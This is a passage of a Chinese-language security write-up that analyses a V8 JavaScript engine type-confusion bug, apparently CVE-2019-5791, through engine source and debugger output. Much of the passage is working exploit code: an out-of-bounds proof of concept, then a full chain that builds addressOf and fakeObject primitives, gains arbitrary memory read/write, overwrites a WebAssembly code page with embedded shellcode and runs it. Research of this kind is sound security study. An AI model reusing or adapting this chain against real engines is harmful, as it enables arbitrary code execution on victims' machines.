if (!current->map()->has_hidden_prototype()) return false;
// JSProxy do not occur as hidden prototypes.
if (object->IsJSProxy()) return false;
PrototypeIterator iter(isolate(), current, kStartAtPrototype,
PrototypeIterator::END_AT_NON_HIDDEN);
while (!iter.IsAtEnd()) {
if (iter.GetCurrent<JSReceiver>() == object) return true;
iter.Advance();
}
return false;
}
其中的if (!current->map()->has_hidden_prototype())
条件具有随机性,我们来看一下它是怎么判断的
BIT_FIELD_ACCESSORS(Map, bit_field3, has_hidden_prototype,
Map::HasHiddenPrototypeBit)
#define BIT_FIELD_ACCESSORS(holder, field, name, BitField) \
typename BitField::FieldType holder::name() const { \
return BitField::decode(field()); \
} \
void holder::set_##name(typename BitField::FieldType value) { \
set_##field(BitField::update(field(), value)); \
}
主要就是取出has_hidden_prototype
这个位进行判断,其中MAP布局如下
+---------------+---------------------------------------------+
| _ Type _ | _ Description _ |
+---------------+---------------------------------------------+
| TaggedPointer | map - Always a pointer to the MetaMap root |
+---------------+---------------------------------------------+
| Int | The first int field |
`---+----------+---------------------------------------------+
| Byte | [instance_size] |
+----------+---------------------------------------------+
| Byte | If Map for a primitive type: |
| | native context index for constructor fn |
| | If Map for an Object type: |
| | inobject properties start offset in words |
+----------+---------------------------------------------+
| Byte | [used_or_unused_instance_size_in_words] |
| | For JSObject in fast mode this byte encodes |
| | the size of the object that includes only |
| | the used property fields or the slack size |
| | in properties backing store. |
+----------+---------------------------------------------+
| Byte | [visitor_id] |
+----+----------+---------------------------------------------+
| Int | The second int field |
`---+----------+---------------------------------------------+
| Short | [instance_type] |
+----------+---------------------------------------------+
| Byte | [bit_field] |
| | - has_non_instance_prototype (bit 0) |
| | - is_callable (bit 1) |
| | - has_named_interceptor (bit 2) |
| | - has_indexed_interceptor (bit 3) |
| | - is_undetectable (bit 4) |
| | - is_access_check_needed (bit 5) |
| | - is_constructor (bit 6) |
| | - has_prototype_slot (bit 7) |
+----------+---------------------------------------------+
| Byte | [bit_field2] |
| | - is_extensible (bit 0) |
| | - is_prototype_map (bit 1) |
| | - is_in_retained_map_list (bit 2) |
| | - elements_kind (bits 3..7) |
+----+----------+---------------------------------------------+
| Int | [bit_field3] |
| | - enum_length (bit 0..9) |
| | - number_of_own_descriptors (bit 10..19) |
| | - is_dictionary_map (bit 20) |
| | - owns_descriptors (bit 21) |
| | - has_hidden_prototype (bit 22) |
| | - is_deprecated (bit 23) |
| | - is_unstable (bit 24) |
| | - is_migration_target (bit 25) |
| | - is_immutable_proto (bit 26) |
| | - new_target_is_base (bit 27) |
| | - may_have_interesting_symbols (bit 28) |
| | - construction_counter (bit 29..31) |
| | |
+*************************************************************+
| Int | On systems with 64bit pointer types, there |
| | is an unused 32bits after bit_field3 |
+*************************************************************+
| TaggedPointer | [prototype] |
+---------------+---------------------------------------------+
| TaggedPointer | [constructor_or_backpointer] |
+---------------+---------------------------------------------+
| TaggedPointer | If Map is a prototype map: |
| | [prototype_info] |
| | Else: |
| | [raw_transitions] |
+---------------+---------------------------------------------+
| TaggedPointer | [instance_descriptors] |
+*************************************************************+
! TaggedPointer ! [layout_descriptors] !
! ! Field is only present if compile-time flag !
! ! FLAG_unbox_double_fields is enabled !
! ! (basically on 64 bit architectures) !
+*************************************************************+
| TaggedPointer | [dependent_code] |
+---------------+---------------------------------------------+
与MAP对象的内存对应起来
pwndbg> p/x current
$178 = {
<v8::internal::HeapObject> = {
<v8::internal::Object> = {
static kHeaderSize = 0x0,
ptr_ = 0x61f6349ed01
...................
pwndbg> x /20gx 0x61f6349ed00
0x61f6349ed00: 0x00002deae918ce19 0x0000317690b80c21
...................
pwndbg> x /20gx 0x00002deae918ce18
0x2deae918ce18: 0x0000317690b81e59 0x0000080000000003
0x2deae918ce28: 0x00002deae918cdf9 0x00002deae918cdf9
..................
可以看到,对应bit_field3
的位置是一个对象指针,因此,bit_field3
的字段具有随机性,是有几率可以满足条件的。这也说明了HolderIsReceiverOrHiddenPrototype
是可以到达条件真的情况。多次运行后,达到条件,接下来就会进入SetDataProperty
► 2529 if (it->HolderIsReceiverOrHiddenPrototype()) {
2530 return SetDataProperty(it, value);
2531 }
pwndbg> p it->HolderIsReceiverOrHiddenPrototype()
$183 = true
SetDataProperty函数如下
Maybe<bool> Object::SetDataProperty(LookupIterator* it, Handle<Object> value) {
.....................
// Possibly migrate to the most up-to-date map that will be able to store
// |value| under it->name().
it->PrepareForDataProperty(to_assign);
// Write the property value.
it->WriteDataValue(to_assign, false);
................
}
主要是调用了it->WriteDataValue(to_assign, false);
void LookupIterator::WriteDataValue(Handle<Object> value,
bool initializing_store) {
DCHECK_EQ(DATA, state_);
Handle<JSReceiver> holder = GetHolder<JSReceiver>();
if (IsElement()) {
Handle<JSObject> object = Handle<JSObject>::cast(holder);
ElementsAccessor* accessor = object->GetElementsAccessor();
accessor->Set(object, number_, *value);
} else if (holder->HasFastProperties()) {
..................
}
其中···accessor->Set(object, number_,
*value);···最终调用到的函数是FixedArray::set
126 void FixedArray::set(int index, Object value) {
► 127 DCHECK_NE(GetReadOnlyRoots().fixed_cow_array_map(), map());
128 DCHECK(IsFixedArray());
129 DCHECK_GE(index, 0);
130 DCHECK_LT(index, this->length());
131 int offset = kHeaderSize + index * kTaggedSize;
132 RELAXED_WRITE_FIELD(*this, offset, value);
从上可以看出,这里SetDataProperty实质是将LookupIterator中的holder_强制当成一个FixedArray,然后往对应的elements写数据。于是,我们可以直接越界写arr对象的length,从而构造一个OOB数组。
最终构造出的OOB POC(Release版本)
function fun() {
var f = (v1 = (function() {
let a = 0;
let b = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2");
//修改fun的MAP为b
b = "a".repeat(0x800);
//修改arr指针为a
a = [1.1,2.2,3.3];
});
}))=>{};
f();
}
let arr = {};
function fun2() {
fun();
}
function fun3() {
fun();
}
fun2();
//%DebugPrint(fun);
//%SystemBreak();
fun3();
//%DebugPrint(arr);
//%SystemBreak();
fun[0x12] = -1;
print(arr.length);
漏洞利用
function fun() {
var f = (v1 = (function() {
let a = 0;
let obj_arr = 0;
let arr_buf = 0;
let b = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2");
//修改fun的MAP为b
b = "a".repeat(0x800);
//修改arr指针为a
a = [1.1,2.2,3.3];
obj_arr = [{}];
arr_buf = new ArrayBuffer(0x1000);
});
}))=>{};
f();
}
let arr = {};
let obj_arr = {};
let arr_buf = {};
function fun2() {
fun();
}
function fun3() {
fun();
}
//生成错误的字节码
fun2();
//执行错误的字节码
fun3();
fun[0x12] = -1;
print("[+] OOB length:" + arr.length);
/*%DebugPrint(arr);
%DebugPrint(obj_arr);
%SystemBreak();
*/
var buf = new ArrayBuffer(0x8);
var dv = new DataView(buf);
function p64f(value) {
dv.setBigUint64(0,BigInt(value),true);
return dv.getFloat64(0,true);
}
function u64f(value) {
dv.setFloat64(0,value,true);
return dv.getBigUint64(0,true);
}
function big2int(value) {
dv.setBigUint64(0,BigInt(value),true);
return dv.getUint32(0,true);
}
function addressOf(obj) {
obj_arr[0] = obj;
return u64f(arr[0xe]) - 0x1n;
}
function fakeObject(addr) {
arr[0xe] = p64f(addr + 0x1n);
return obj_arr[0];
}
var wasmCode = new Uint8Array([0x00,0x61,0x73,0x6D,0x01,0x00,0x00,0x00,0x01,0x85,0x80,0x80,0x80,0x00,0x01,0x60,0x00,0x01,0x7F,0x03,0x82,0x80,0x80,0x80,0x00,0x01,0x00,0x04,0x84,0x80,0x80,0x80,0x00,0x01,0x70,0x00,0x00,0x05,0x83,0x80,0x80,0x80,0x00,0x01,0x00,0x01,0x06,0x81,0x80,0x80,0x80,0x00,0x00,0x07,0x91,0x80,0x80,0x80,0x00,0x02,0x06,0x6D,0x65,0x6D,0x6F,0x72,0x79,0x02,0x00,0x04,0x6D,0x61,0x69,0x6E,0x00,0x00,0x0A,0x8A,0x80,0x80,0x80,0x00,0x01,0x84,0x80,0x80,0x80,0x00,0x00,0x41,0x2A,0x0B]);
var shellcode = new Uint32Array([186,114176,46071808,3087007744,41,2303198479,3091735556,487129090,16777343,608471368,1153910792,4132,2370306048,1208493172,3122936971,16,10936,1208291072,1210334347,50887,565706752,251658240,1015760901,3334948900,1,8632,1208291072,1210334347,181959,565706752,251658240,800606213,795765090,1207986291,1210320009,1210334349,50887,3343384576,194,3913728,84869120]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;
var wasm_shellcode_ptr_addr = addressOf(wasmInstance) + 0x108n;
print("[+] wasm_shellcode_ptr_addr=" + wasm_shellcode_ptr_addr.toString(16));
/*%DebugPrint(arr);
%DebugPrint(arr_buf);
%SystemBreak();
*/
arr[0x1c] = p64f(wasm_shellcode_ptr_addr);
var adv = new DataView(arr_buf);
var wasm_shellcode_addr = adv.getBigUint64(0,true);
print('[+] wasm_shellcode_addr=' + wasm_shellcode_addr.toString(16));
arr[0x1c] = p64f(wasm_shellcode_addr);
//替换wasm的shellcode
for (var i=0;i<shellcode.length;i++) {
adv.setUint32(i*4,shellcode[i],true);
}
//执行shellcode
func();
0x03 感想
通过这个漏洞,学习了V8的Iginition架构,对字节码的生成以及执行过程有了一定的了解,对虚拟机架构也有了一定的了解。对于IC缓存机制也有了一定的理解,这种方面的漏洞也是比较少见,牵涉到的知识面广,收获很多。
0x04 参考
理解 V8 的字节码「译」
Ignition:V8解释器 「译」
V8是如何执行JavaScript代码的?
[Ignition: An Interpreter for V8
BlinkOn]
抛弃 V8 参数适配器框架:JavaScript 调用提速 40%
的实践 Faster
JavaScript calls V8 Iginition
Interpreter &&
IC v8
cve-2019-5791:模块耦合导致的类型混淆
Issue 926651: Security: [v8] Type Confusion in
Builtins_CallUndefinedReceiver1Handler